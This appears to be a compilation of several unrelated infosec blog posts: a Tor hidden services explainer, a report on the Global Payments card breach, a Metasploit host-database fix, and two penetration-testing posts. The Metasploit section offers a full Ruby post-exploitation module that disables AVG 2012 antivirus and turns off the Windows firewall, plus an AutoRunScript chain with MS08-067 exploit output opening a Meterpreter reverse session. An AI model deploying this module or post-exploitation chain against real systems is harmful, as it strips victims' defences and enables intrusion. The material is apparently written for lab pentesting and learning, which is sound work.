What Are ToR Hidden Services?

What Are ToR Hidden Services?:
gAtO's thoughts: Anonymity serves different interests for different user groups. To a private citizen it’s privacy, to a business it’s a network security issue.
A business needs to protect trade secrets or have IPs (knowledge base data-centers) communicate with vendors securely, and we all know that business needs to keep an eye on their competition.
The competition can check your stats (http://www.alexa.com/siteinfo/uscyberlabs.com) and see on how your business is doing, what keywords you're using, demographics of users hitting your site, etc...
By the way in the Tor-.onion network, a web site/service cannot be monitored unless you want it to be…
How would a government use a ToR-network I’m asked all the time...
If I were an (agent/business/person) state actor doing business in China (and other countries too), well I would use a ToR-.onion connection to keep my business private from a government that is known to snoop a bit on travelers to their country.
The fact is governments need anonymity for their security - think about it: “What does the CIA Google for?” Maybe they use ToR??? But this is about Hidden services, right?
What is a hidden service in ToR-.onion network?
Simply put, it’s a web site/service, a place in the ToR network, were we have services like:

• 
  Search Engine
• 
  Directories
• 
  web / pop3 email
• 
  PM Private Messages
• 
  Drop Box’s
• 
  Re-mailers
• 
  Bulletin Boards BBS
• 
  Image Boards
• 
  Currency exchange
• 
  Blog
• 
  E-Commerce
• 
  Social Networks
• 
  Micro-Blogs

Hidden Services are called "hidden" because your website’s IP in ToR is hidden - they cannot see the IP of your server — they can’t track you. If they can’t find you, how are they gonna hack you???? Sorry I had to say that (more about that later).
Now how do I keep my IP secret and let you use my services? On the normal web, if you’re at uscyberlabs.com you're on my site - my server - so you can do a WhoIs and get my IP and geolocation - then you can attack my website with DDoS and other IP attack vectors, you also get my location so you can physically find me - my server, my website – and maybe go dumpster diving in the trash and get my company secrets - mAyBe sI – nO.
Well, in the ToR-.onion network you the client ask the business website if you can use the website's services, then decide and start a handshake at a rendezvous POINT to meet  - we meet at an OR (onion relay) - a rendezvous POINT not at my server/my IP — so you're never ever on the business site/server when you’re in OnionLand, and you can’t do a WhoIs and get my IP because we met at an OR, and you cannot find my geo-location…..
We have heard of Iranian and Syrian rebels being killed in the news. When an Iranian rebel is fighting for his and his family’s life if they (the government) find his IP or the IP of the website he visited they will hunt that person down and the Iranian police/government may kill the whole family. So keeping an IP from someone is not an evil act, it is an act of privacy for safety on both sides the of client and the business.
Now let’s focus on R2 OR the yellow key. That’s the spot where you (your company’s hidden website) and your client meet — I know it’s a sneaky way of doing business, but once again if they can’t get to your IP at least that is one attack vector that can’t be used to hack you or DDoS you. OK they can still hack you but it’s via software then.
How it’s all done – the magic - the technical thingy to this is below - this is just an outline of events of the client /hidden web/service protocol:
(click image to enlarge)



It goes something like this:

• 
  ESTABLISH RENDEZVOUS cell
• 
  INTRODUCE1
• 
  INTRODUCE2 cell
• 
  INTRODUCE ACK cell.
• 
  INTRODUCE2 cell
• 
  RENDEZVOUS1 cell
• 
  sends a RENDEZVOUS2 cell Chat
• 
  sends a RENDEZVOUS2 cell Blog
• 
  RENDEZVOUS ESTABLISHED cell

More Geek network kinda stuff:
1. Jun 03 20:50:02.100 [notice] Tor 0.2.1.0-alpha-dev (r14739) opening new log file.
2. Jun 03 20:50:11.151 [notice] We now have enough directory information to build circuits.
3. Jun 03 20:50:12.697 [info] rend_services_introduce(): Giving up on sabotage as intro point for stuptdu2qait65zm.
4. Jun 03 20:50:18.633 [info] rend_service_intro_established(): Received INTRO_ESTABLISHED cell on circuit 1560 for service stuptdu2qait65zm
5. Jun 03 20:51:18.997 [info] upload_service_descriptor(): Sending publish request for hidden service stuptdu2qait65zm
6. Jun 03 20:51:22.878 [info] connection_dir_client_reached_eof(): Uploaded rendezvous descriptor (status 200 (“Service descriptor stored”))
People ask me how can these hidden services can be attacked?
Its all the same as in the surface web - you find the software the hidden service is using (let’s say Wordpress or FlatPress) and if they use an old version with vulnerabilities then that site can be hacked by traditional attack vectors.
gAtO can’t wait till USCyberLabs.com will have a sandbox in the .onion were we can have a honeypot for people to hack and learn from  (we need funding for these projects)
gAtO has not tried Backtrack 5 on ToR-.onion network – mAyBe sI -nO – uscyberlabs.com has been hacked a few times already and is consistently fighting bot’s and spammers, and so it goes everywhere...
Here are some technologies used in the ToR-.onion network:

• 
  TorStatusNet – http://lotjbov3gzzf23hc.onion/   is a microblogging service. It runs the StatusNet microblogging software, version 0.9.9, available under the GNU Affero General Public License.
• 
  FlatPress is a blogging engine like -Wordpress blog http://flatpress.org/home/   – http://utup22qsb6ebeejs.onion/ -
• 
  Snapp BBS works fine in OnionLand - http://4eiruntyxxbgfv7o.onion/ -
• 
  PHP BBS – http://65bgvta7yos3sce5.onion/
• 
  Nginx is a free, open-source, high-performance HTTP server and reverse proxy, as well as an IMAP/POP3 proxy server.  – http://ay5kwknh6znfmcbb.onion/torbook/

Anyway, I hope this opens up the mystery of a hidden service in ToR – it’s just a website, you go to a rendezvous point and do your business — your IP and the business IP are totally secure. No digital breadcrumbs.
Now a word to the wise - in the ToR-.onion network you have some very tech savvy people and some are very stupid, so be a critical cyber user alway.
gAtO oUt...
Cross-posted from US Cyber Labs
Copyright 2010 Respective Author at Infosec Island

Global Payments Inc -Security Breach Compromised 1.5 Million of Visa and MasterCard

Global Payments Inc -Security Breach Compromised 1.5 Million of Visa and MasterCard:

Global Payments Inc -Security Breach Compromised 1.5 Million of Visa and MasterCard

Earlier in this year cyber criminals had breached the security system Global Payments Inc. a leader in payment processing services. During breach experts have estimated that more than 50,000 Visa and MasterCard information was stolen. And now after the investigation Global Payments says that no more than 1.5 million credit card numbers were harvested during the intrusion into its systems disclosed earlier this year. The incident only affects North American Visa and MasterCard customers. The Company has, however, provided a larger quantity of card numbers to industry brands to enable them to proactively monitor cardholder activity.  The evidence continues to indicate that the potential card exportation was limited to Track 2 data. 

This type of track data on the magnetic stripe of a credit card includes numerical data such as the card number and the expiry date but doesn't include information like the card owner's name.

Additionally, Global Payments says that it believes that not all of the nearly 1.5 million cards have been compromised. However, the payment processing company has notified credit card companies of all potentially affected numbers so that they can "proactively monitor cardholder activity"; Global Payments has previously said that it might pass on further card numbers for monitoring purposes. Paul R. Garcia, the Chairman and CEO of Global Payments, has apologised for the incident and said that his company is working diligently to conclude its investigations. At the end of its fiscal year in July, the company plans to present its shareholders with a final report on the incident. Once investigations are complete, the payment processing firm plans to reapply as a "PCI DSS Compliant Service Provider" with MasterCard and Visa: after the incident was made public, the credit card companies revoked Global Payments' certification.

Fixing db_nmap misidentified operating systems inside the metasploit host database

Fixing db_nmap misidentified operating systems inside the metasploit host database:
I was doing some scanning the other day against my test lab of VM’s. I noticed that nmap and db_nmap were seeing my windows XP machine as Server 2003. Nmap identified its OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003. When it’s placed inside of the metasploit db, it has the os_flavor 2003. This could be a problem depending on resource scripts or when you attempt to use an exploit against the box.

135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn
443/tcp  open  https?
|_ssl-cert: ERROR
445/tcp  open  microsoft-ds  Microsoft Windows XP microsoft-ds <=========
1027/tcp open  msrpc         Microsoft Windows RPC
1433/tcp open  ms-sql-s      Microsoft SQL Server 2005 9.00.1399.00; RTM
3389/tcp open  microsoft-rdp Microsoft Terminal Service
MAC Address: 00:0C:29:91:D5:28 (VMware)

The scan shows 445/tcp and clearly says XP.

Here is that same machine’s info inside the database.

msf > hosts

Hosts
=====

address        mac                name            os_name            os_flavor  os_sp  purpose  info  comments
-------        ---                ----            -------            ---------  -----  -------  ----  --------
10.10.101.3    00:0c:29:5f:4f:b7  dc1             Microsoft Windows  2003       SP1    server         
10.10.101.5                       ns              Linux              Ubuntu            server         
10.10.101.8    00:0c:29:60:8a:e8  dc2             Microsoft Windows  2008              server         
10.10.101.11   00:0c:29:d4:bc:0d  winxpsp3-vm     Microsoft Windows  2003 <==== SP3    client 
10.10.101.109                                     Linux              Ubuntu            server         
10.10.101.110                                     Linux              Ubuntu            server         
10.10.101.111                     metasploitable  Unknown                              device         

Now the question is how do we fix this?

Start msfconsole and type irb.

msf > irb
[*] Starting IRB shell...

>> 

Now type:

host = framework.db.workspace.hosts.find_by_address("10.10.101.11")
host.os_flavor="XP"
host.save
exit

Change 10.10.101.11 to the IP address of the host you are trying to modify.

Now run the hosts command and see that the flavor is corrected.

Killing AVG2012

Killing AVG2012:
I was re-watching/restudying some of the videos for Metasploit Framework Expert. One video in particular “Lesson 7: Post Exploitation Kill AV and Bypass Firewall”, made me decided to automate the task with a post exploit module.

##
# $Id: kill_avg_2012.rb 2012-05-12 02:19:00Z $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
require 'msf/core'
require 'msf/core/post/common'
require 'msf/core/post/windows/registry'


class Metasploit3 < Msf::Post

 include Msf::Post::Windows::Registry
 include Msf::Post::Common
 

 def initialize(info={})
  super( update_info( info,
   'Name'          => 'Windows Manage Stop AVG',
   'Description'   => %q{ This module removes the AVG tray from starting in the registry. It also changes the startup mode of avg watchdog and              AVGIDSAgent from automatic to disabled. },
   'License'       => BSD_LICENSE,
   'Author'        => [ '3vi1john Jbabio@me.com'],
   'Version'       => '$Revision: 20 ${body}#39;,
   'Platform'      => [ 'windows' ],
   'SessionTypes'  => [ 'meterpreter' ]
  ))

  register_options(
   [
     OptBool.new(  'REBOOT',   [ false, 'Reboot', false]),
     OptBool.new(  'KILLFW',   [ false, 'Turn the Windows firwall off', true]),
   ], self.class)
  end
  
 
 def rem_avg_tray_x86
 begin
  key = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
      value = "AVG_TRAY"
      v = registry_getvaldata(key, value)
      print_status "Checking for AVG Tray..." 
      if v == '"C:\Program Files\AVG\AVG2012\avgtray.exe"'
       print_status "\tAVG_TRAY found; removing it..."
       registry_deleteval(key, value)    
      else
       print_status "\tAVG_TRAY is already gone..."
      end
  rescue::Exception => e
         print_status "\tThe following Error was encountered: #{e.class} #{e}"
  end 
 end 
      
  
 def rem_avg_tray_amd64
     begin 
  key = "HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
      value = "AVG_TRAY"
      v = registry_getvaldata(key, value)
      print_status "Checking for AVG Tray..." 
      if v == '"C:\Program Files (x86)\AVG\AVG2012\avgtray.exe"'
       print_status "\tAVG_TRAY found; removing it..."
       registry_deleteval(key, value)    
      else
       print_status "\tAVG_TRAY is already gone..."
      end
      rescue::Exception => e
         print_status "\tThe following Error was encountered: #{e.class} #{e}"
  end 
 end

 def rem_avg_services
     begin  
  key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\avgwd"
  value = "Start"
  v = registry_getvaldata(key, value)  
  if v == 2 
   print_status "\tService avgwd is set to Auto..."
   print_status "\tChanging avgwd service from auto to disabled..."
   cmd_exec('sc', 'config avgwd start= disabled', 30)
  else v == 4
         print_status "\tService avgwd is already Disabled..."
  end
  
         key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\AVGIDSAgent"
  value = "Start"
  if v == 2
   print_status "\tService AVGIDSAgent is set to Auto..."
     print_status "\tChanging AVGIDSAgent service from auto to disabled..."
     cmd_exec('sc', 'config AVGIDSAgent start= disabled', 30)
  else v == 4
         print_status "\tService AVGIDSAgent is already Disabled..."
  end
  rescue::Exception => e
         print_status "\tThe following Error was encountered: #{e.class} #{e}"
  end  
 end
 
 def kill_firewall
     begin
  sysnfo = client.sys.config.sysinfo['OS']
  if sysnfo =~/Windows XP/
   print_status "\tKilling #{sysnfo} Firewall..."   
   cmd_exec('netsh', 'firewall set opmode MODE = disable', 30)  
  else sysnfo =~/Windows 7|Server 2008|Windows Vista/
   print_status "\tKilling #{sysnfo} Firewall..."
   cmd_exec('netsh', 'advfirewall set allprofiles state off', 30)
  end
  rescue::Exception => e
   print_status "\tThe following Error was encountered: #{e.class} #{e}"
  end
 end

 def run
  begin  
   arch = client.sys.config.sysinfo['Architecture']
   if arch =~/x86/
      rem_avg_tray_x86
    rem_avg_services
   else arch =~/x64/
     rem_avg_tray_amd64
    rem_avg_services
   end   
   if datastore['REBOOT']
         session.console.run_single("reboot")   
         end
   if datastore['KILLFW']
    kill_firewall
   end          
   
   rescue::Exception => e
    print_status("The following Error was encountered: #{e.class} #{e}")
   end
   print_status "\tDone!" 
 end
 
end 

Automation is the name of the pentest game

Automation is the name of the pentest game:
Metasploit auto run scripts are great when you need a module to run automatically post exploitation. Getting a single script to run post meterpreter is pretty easy, but what if you wanted multiple post scripts to run? From the msfconsole prompt run: set AutoRunScript multi_console_command -rc “path/name of rc file”

msf > set AutoRunScript multi_console_command -rc /root/autoruncommands.rc

Inside of the rc file just list the commands one by one like so:

run post/windows/manage/migrate

run post/windows/manage/killfw

run post/windows/gather/checkvm

Now save the file autoruncommands.rc inside of the root folder. Don’t use killfw because you won’t find it in your install. It is a module I wrote to autokill the windows firewall.
Now lets watch it in action:

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.10.200.40:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 10.10.101.11
[*] Meterpreter session 6 opened (10.10.200.40:4444 -> 10.10.101.11:1125) at 2012-04-22 17:58:16 -0400

meterpreter > 
[*] Session ID 6 (10.10.200.40:4444 -> 10.10.101.11:1125) processing AutoRunScript 'multi_console_command -rc /root/autoruncommands.rc'
[*] Running Command List ...
[*]  Running command run post/windows/manage/migrate
[*] Running module against XPVM-SP2
[*] Current server process: svchost.exe (1324)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3984
[+] Successfully migrated to process 3984
[*]  Running command run post/windows/manage/killfw
[+] Killing Windows Firewall...
[+] Done!
[*]  Running command run post/windows/gather/checkvm
[*] Checking if XPVM-SP2 is a Virtual Machine .....
[*] This is a VMware Virtual Machine